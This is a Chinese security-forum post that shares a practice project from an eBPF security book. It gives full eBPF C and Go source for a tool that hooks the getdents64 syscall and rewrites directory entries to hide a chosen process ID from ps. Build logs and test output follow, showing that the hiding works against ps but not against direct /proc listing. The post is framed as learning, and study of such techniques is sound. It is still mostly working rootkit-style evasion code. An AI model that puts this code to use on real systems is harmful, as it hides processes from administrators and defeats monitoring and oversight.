首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[分享]基于eBPF的进程隐藏技术
发表于: 2025-1-18 19:45 3141

[分享]基于eBPF的进程隐藏技术

Jtian 活跃值
1
2025-1-18 19:45
3141

这是一个练习项目,主要是针对《eBPF云原生安全:原理与实践》的chapter14的hide-pid的代码实践,仅修改了指定pid的小部分代码。最终实现了通过-p参数指定想要隐藏的进程号,在执行ps -ef的时候无法观察到被隐藏的进程。

实验环境

操作系统版本

1
2
3
4
Ubuntu 22.04.3 LTS
 
# uname -a
Linux Jtian 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

编译环境准备

1
2
3
4
5
6
7
8
9
10
11
12
13
git clone https://github.com/mozillazg/cloud-native-security-with-ebpf.git
 
https://github.com/libbpf/bpftool/releases/download/v7.5.0/bpftool-v7.5.0-amd64.tar.gz
tar xvf bpftool-v7.5.0-amd64.tar.gz
cp bpftool /usr/bin
 
apt-get update
apt-get install libelf-dev
apt-get install clang
 
apt-get install golang-1.23-go
ln -s /usr/lib/go-1.23/bin/go go
go env -w GOPROXY=https://goproxy.cn,direct

hide-pid-p主要代码

参考cloud-native-security-with-ebpf/chapter14/hide-pid代码,只修改了main.go获取pid的部分代码,使得可以通过-p参数可以隐藏指定的进程。

main.bpf.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "main.h"
 
struct {
    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
    __uint(key_size, sizeof(u32));
    __uint(value_size, sizeof(u32));
} events SEC(".maps");
 
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 2048);
    __type(key, u64);
    __type(value, long unsigned int);
} dirp_map SEC(".maps");
 
static const volatile struct config_t configs;
 
SEC("tracepoint/syscalls/sys_enter_getdents64")
int tracepoint_syscalls__sys_enter_getdents64(struct trace_event_raw_sys_enter *ctx) {
    u64 tid = bpf_get_current_pid_tgid();
 
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)BPF_CORE_READ(ctx, args[1]);
 
    bpf_map_update_elem(&dirp_map, &tid, &dirp, BPF_ANY);
    return 0;
}
 
SEC("tracepoint/syscalls/sys_exit_getdents64")
int tracepoint_syscalls__sys_exit_getdents64(struct trace_event_raw_sys_exit *ctx) {
    struct event_t event = { 0 };
    u64 tid = bpf_get_current_pid_tgid();
    int total_bytes_read = BPF_CORE_READ(ctx, ret);
    if (total_bytes_read <= 0) {
        return 0;
    }
    long unsigned int *pp = bpf_map_lookup_elem(&dirp_map, &tid);
    if (!pp) {
        return 0;
    }
    char to_hide_pid[MAX_NAME];
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        to_hide_pid[i] = configs.to_hide_pid[i];
        if (to_hide_pid[i] == '\0') {
            break;
        }
    }
 
    bool overwrite = false;
    int overwrite_ret = 0;
 
    //
    struct linux_dirent64 *pre_dirent_start = (struct linux_dirent64*)*pp;
    struct linux_dirent64 *current_dirent_start;
    char current_dir[MAX_NAME] = {};
    //
    short unsigned int pre_reclen = 0;
    short unsigned int current_reclen = 0;
    short unsigned int overwrite_reclen = 0;
    int current_total = 0;
 
    #pragma unroll
    for (int i = 0; i < 1024; i++) {
        // 通过指针操作获取当前 struct linux_dirent64 实例
        current_dirent_start = (struct linux_dirent64*)((void *)pre_dirent_start + pre_reclen);
        // 读取 d_name 和 d_reclen 字段的值
        bpf_probe_read_user(&current_dir, sizeof(current_dir), (char *)current_dirent_start->d_name);
        bpf_probe_read_user(&current_reclen, sizeof(current_reclen), (void *)&current_dirent_start->d_reclen);
 
        // 如果是待隐藏 pid 的目录
        if (str_eq(current_dir, to_hide_pid, MAX_NAME)) {
            // 修改上一个示例的 reclen 字段长度,让它覆盖当前实例长度,达到跳过当前实例的目的,结果就是从 ps 结果中隐藏了该 pid
            overwrite_reclen = pre_reclen + current_reclen;
            overwrite_ret = bpf_probe_write_user(&pre_dirent_start->d_reclen, &overwrite_reclen, sizeof(overwrite_reclen));
            overwrite = true;
            break;
        }
 
        // 防止内存越界
        current_total += current_reclen;
        if (current_total >= total_bytes_read) {
            break;
        }
 
        // 处理下一个实例
        pre_reclen = current_reclen;
        pre_dirent_start = current_dirent_start;
    }
 
    if (!overwrite) {
        return 0;
    }
 
 
    event.pid = bpf_get_current_pid_tgid() >> 32;
    event.ret = overwrite_ret;
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        event.hidden_pid[i] = configs.to_hide_pid[i];
        if (event.hidden_pid[i] == '\0') {
            break;
        }
    }
    bpf_get_current_comm(&event.comm, sizeof(event.comm));
 
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(struct event_t));
 
    return 0;
}
 
 
char _license[] SEC("license") = "GPL";

main.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
package main
 
import (
    "flag"
    "bytes"
    "context"
    "encoding/binary"
    "fmt"
    "log"
    "os"
    "os/signal"
    "syscall"
 
    bpf "github.com/aquasecurity/libbpfgo"
)
 
type Event struct {
    Pid       uint32
    Ret       uint32
    HiddenPid [8]byte
    Comm      [16]byte
}
 
type Config struct {
    ToHidePid [8]byte
}
 
func parseEvent(data []byte) (*Event, error) {
    var event Event
    err := binary.Read(bytes.NewBuffer(data), binary.LittleEndian, &event)
    if err != nil {
        return nil, err
    }
    return &event, nil
}
 
func main() {
    var err error
    defer func() {
        if err != nil {
            log.Fatalf("%+v", err)
        }
    }()
 
    /*
    pid := os.Getpid()
    log.Printf("pid: %d\n", pid)
    toHidePid := [8]byte{}
    bs := []byte(fmt.Sprintf("%d", pid))
    for i, v := range bs {
        toHidePid[i] = v
    }*/
 
    var pidStr string
    flag.StringVar(&pidStr, "p", "", "进程ID")
    flag.Parse()
 
    if pidStr == "" {
        fmt.Printf("Usage: %s -p pid\n\n", os.Args[0])
        return
    }
     
    var toHidePid [8]byte
    copy(toHidePid[:], pidStr)
 
    bpfModule, err := bpf.NewModuleFromFile("main.bpf.o")
    if err != nil {
        return
    }
    defer bpfModule.Close()
 
    config := Config{ToHidePid: toHidePid}
    if err = bpfModule.InitGlobalVariable("configs", config); err != nil {
        return
    }
 
    if err = bpfModule.BPFLoadObject(); err != nil {
        return
    }
    progIter := bpfModule.Iterator()
    for {
        prog := progIter.NextProgram()
        if prog == nil {
            break
        }
        _, err = prog.AttachGeneric()
        if err != nil {
            return
        }
    }
    log.Println("tracing...")
    eventsChannel := make(chan []byte)
    lostChannel := make(chan uint64)
    pb, err := bpfModule.InitPerfBuf("events", eventsChannel, lostChannel, 1024)
    if err != nil {
        return
    }
    //log.Printf("will hide pid %d", pid)
    ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt, syscall.SIGTERM)
 
    pb.Start()
    defer func() {
        pb.Stop()
        pb.Close()
        stop()
    }()
 
loop:
    for {
        select {
        case data := <-eventsChannel:
            event, e := parseEvent(data)
            if e != nil {
                err = e
                return
            } else {
                log.Printf("pid: %d, comm: %s, hidden_pid: %s ret: %d",
                    event.Pid, event.Comm, event.HiddenPid, event.Ret)
            }
        case n := <-lostChannel:
            log.Printf("lost %d events", n)
        case <-ctx.Done():
            break loop
        }
    }
    log.Println("bye bye~")
}

编译

执行make build,生成 main 和 main.bpf.o 文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make clean
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src clean
rm -rf ./output
rm -rf vmlinux.h
rm -rf main
rm -rf main.bpf.o main.o
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  CLEAN
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main.bpf.c  main.go  main.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make build
make -C . main
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
mkdir -p ./output/libbpf
CC="gcc" CFLAGS="-ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function" LD_FLAGS="" \
   make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src \
        BUILD_STATIC_ONLY=1 \
        OBJDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf \
        DESTDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output \
        INCLUDEDIR= LIBDIR= UAPIDIR= prefix= libdir= install
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src UAPIDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output install_uapi_headers
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  MKDIR    /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_errno.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/netlink.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/nlattr.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/str_error.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_probes.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf_prog_linfo.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf_dump.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/hashmap.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/ringbuf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/strset.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/linker.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/gen_loader.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/relo_core.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/usdt.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/zip.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/elf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/features.o
  AR       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
  INSTALL  bpf.h libbpf.h btf.h libbpf_common.h libbpf_legacy.h bpf_helpers.h bpf_helper_defs.h bpf_tracing.h bpf_endian.h bpf_core_read.h skel_internal.h libbpf_version.h usdt.bpf.h
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.pc
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  INSTALL  ../include/uapi/linux/bpf.h ../include/uapi/linux/bpf_common.h ../include/uapi/linux/btf.h
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
INFO: generating vmlinux.h from /sys/kernel/btf/vmlinux
clang -ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function -target bpf -D__TARGET_ARCH_x86 -I. -I./output -c main.bpf.c -o main.bpf.o
CC=clang \
        CGO_CFLAGS="-I/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output" \
        CGO_LDFLAGS="-lelf -lz /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf.a" \
        GOARCH=amd64 \
        go build \
        -tags netgo -ldflags '-w -extldflags "-static"' \
        -o main ./main.go
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main  main.bpf.c  main.bpf.o  main.go  main.h  output  vmlinux.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#

测试效果

随便启动一个python进程,并获得进程号pid

1
2
3
4
5
root@Jtian:~# python
Python 3.10.12 (main, Nov  6 2024, 20:22:13) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>

获得python的pid号为 119558

1
2
3
4
5
root@Jtian:~# ps -ef|grep python
root      119558    3209  0 19:27 pts/0    00:00:00 python
root      119741   90282  0 19:28 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#
root@Jtian:~#

隐藏指定进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ./main -p 119558
libbpf: loading main.bpf.o
libbpf: elf: section(3) tracepoint/syscalls/sys_enter_getdents64, size 176, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_enter_getdents64': found program 'tracepoint_syscalls__sys_enter_getdents64' at insn offset 0 (0 bytes), code size 22 insns (176 bytes)
libbpf: elf: section(4) .reltracepoint/syscalls/sys_enter_getdents64, size 16, link 30, flags 40, type=9
libbpf: elf: section(5) tracepoint/syscalls/sys_exit_getdents64, size 130472, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_exit_getdents64': found program 'tracepoint_syscalls__sys_exit_getdents64' at insn offset 0 (0 bytes), code size 16309 insns (130472 bytes)
libbpf: elf: section(6) .reltracepoint/syscalls/sys_exit_getdents64, size 160, link 30, flags 40, type=9
libbpf: elf: section(7) .maps, size 56, link 0, flags 3, type=1
libbpf: elf: section(8) .rodata, size 8, link 0, flags 2, type=1
libbpf: elf: section(9) license, size 4, link 0, flags 3, type=1
libbpf: license of main.bpf.o is GPL
libbpf: elf: section(20) .BTF, size 3677, link 0, flags 0, type=1
libbpf: elf: section(22) .BTF.ext, size 157068, link 0, flags 0, type=1
libbpf: elf: section(30) .symtab, size 6864, link 1, flags 0, type=2
libbpf: looking for externs among 286 symbols...
libbpf: collected 0 externs total
libbpf: map 'dirp_map': at sec_idx 7, offset 0.
libbpf: map 'dirp_map': found type = 9.
libbpf: map 'dirp_map': found key [8], sz = 8.
libbpf: map 'dirp_map': found value [12], sz = 8.
libbpf: map 'dirp_map': found max_entries = 2048.
libbpf: map 'events': at sec_idx 7, offset 32.
libbpf: map 'events': found type = 4.
libbpf: map 'events': found key_size = 4.
libbpf: map 'events': found value_size = 4.
libbpf: map 'main.rodata' (global data): at sec_idx 8, offset 0, flags 80.
libbpf: map 2 is "main.rodata"
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': collecting relocation for section(3) 'tracepoint/syscalls/sys_enter_getdents64'
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': relo #0: insn #16 against 'dirp_map'
....
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #512: patched insn #16188 (ALU/ALU64) imm 16 -> 16
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: <byte_off> [34] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: matching candidate #0 <byte_off> [36451] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: patched insn #16247 (ALU/ALU64) imm 16 -> 16
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...

观察进程隐藏效果 | 针对ps -ef有效,但针对ls -l /proc/xxx无效

针对ps -ef有效

1
2
3
root@Jtian:~# ps -ef|grep python
root      120545   90282  0 19:31 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#

每次执行ps -ef,在进程隐藏的程序中也有打印出相应日志。

1
2
3
4
5
6
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...
2025/01/18 19:31:42 pid: 121264, comm: ps, hidden_pid: 119558 ret: 0

针对ls -l /proc/xxx无效

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@Jtian:~#
root@Jtian:~# ls -l /proc/119558
total 0
-r--r--r--  1 root root 0 Jan 18 19:37 arch_status
dr-xr-xr-x  2 root root 0 Jan 18 19:37 attr
-r--------  1 root root 0 Jan 18 19:37 auxv
-r--r--r--  1 root root 0 Jan 18 19:37 cgroup
--w-------  1 root root 0 Jan 18 19:37 clear_refs
-r--r--r--  1 root root 0 Jan 18 19:28 cmdline
-rw-r--r--  1 root root 0 Jan 18 19:37 comm
-rw-r--r--  1 root root 0 Jan 18 19:37 coredump_filter
-r--r--r--  1 root root 0 Jan 18 19:37 cpuset
lrwxrwxrwx  1 root root 0 Jan 18 19:37 cwd -> /root
-r--------  1 root root 0 Jan 18 19:37 environ
lrwxrwxrwx  1 root root 0 Jan 18 19:37 exe -> /usr/bin/python3.10
dr-x------  2 root root 0 Jan 18 19:37 fd
dr-xr-xr-x  2 root root 0 Jan 18 19:37 fdinfo
-rw-r--r--  1 root root 0 Jan 18 19:37 gid_map
-r--------  1 root root 0 Jan 18 19:37 io
-r--r--r--  1 root root 0 Jan 18 19:37 limits
-rw-r--r--  1 root root 0 Jan 18 19:37 loginuid
dr-x------  2 root root 0 Jan 18 19:37 map_files
-r--r--r--  1 root root 0 Jan 18 19:37 maps
-rw-------  1 root root 0 Jan 18 19:37 mem
-r--r--r--  1 root root 0 Jan 18 19:37 mountinfo
-r--r--r--  1 root root 0 Jan 18 19:37 mounts
-r--------  1 root root 0 Jan 18 19:37 mountstats
dr-xr-xr-x 65 root root 0 Jan 18 19:37 net
dr-x--x--x  2 root root 0 Jan 18 19:37 ns
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_adj
-r--r--r--  1 root root 0 Jan 18 19:37 oom_score
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_score_adj
-r--------  1 root root 0 Jan 18 19:37 pagemap
-r--------  1 root root 0 Jan 18 19:37 personality
-rw-r--r--  1 root root 0 Jan 18 19:37 projid_map
lrwxrwxrwx  1 root root 0 Jan 18 19:37 root -> /
-rw-r--r--  1 root root 0 Jan 18 19:37 sched
-r--r--r--  1 root root 0 Jan 18 19:37 schedstat
-r--r--r--  1 root root 0 Jan 18 19:37 sessionid
-rw-r--r--  1 root root 0 Jan 18 19:37 setgroups
-r--r--r--  1 root root 0 Jan 18 19:37 smaps
-r--r--r--  1 root root 0 Jan 18 19:37 smaps_rollup
-r--------  1 root root 0 Jan 18 19:37 stack
-r--r--r--  1 root root 0 Jan 18 19:28 stat
-r--r--r--  1 root root 0 Jan 18 19:37 statm
-r--r--r--  1 root root 0 Jan 18 19:28 status
-r--------  1 root root 0 Jan 18 19:37 syscall
dr-xr-xr-x  3 root root 0 Jan 18 19:37 task
-rw-r--r--  1 root root 0 Jan 18 19:37 timens_offsets
-r--r--r--  1 root root 0 Jan 18 19:37 timers
-rw-rw-rw-  1 root root 0 Jan 18 19:37 timerslack_ns
-rw-r--r--  1 root root 0 Jan 18 19:37 uid_map
-r--r--r--  1 root root 0 Jan 18 19:37 wchan
root@Jtian:~#

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2025-1-18 19:52 被Jtian编辑 ,原因:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回